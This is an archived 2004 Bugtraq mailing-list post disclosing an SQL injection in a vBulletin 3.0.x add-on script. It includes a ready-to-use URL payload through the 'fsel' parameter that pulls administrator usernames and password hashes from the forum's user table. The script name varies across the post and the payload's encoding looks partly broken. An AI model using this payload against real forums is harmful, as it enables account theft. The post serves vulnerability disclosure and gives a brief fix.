SQL injection in vBulletin forums (last10.php)

From: Dr. Death (drdeath4ever_at_hotmail.com)
Date: 11/11/04

Next message: Jirka Kosina: "Re: [Full-Disclosure] Re: Linux ELF loader vulnerabilities"

Previous message: Ted Percival: "Re: Linux ELF loader vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com
Date: Thu, 11 Nov 2004 05:29:44 +0000

hi all,

a new SQL injection found in VBulletin Forums 3.0.x

the Vulnerabilite found in last.php, last 10 topics hack.

last.php?fsel=,user.password%20as%20title,user.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

to solve the problem delet fsel? from ttlast.php and last10.php

Best Regards,
Dr.Death
THE MAN OF THE DARK SIDE

Next message: Jirka Kosina: "Re: [Full-Disclosure] Re: Linux ELF loader vulnerabilities"

Previous message: Ted Percival: "Re: Linux ELF loader vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]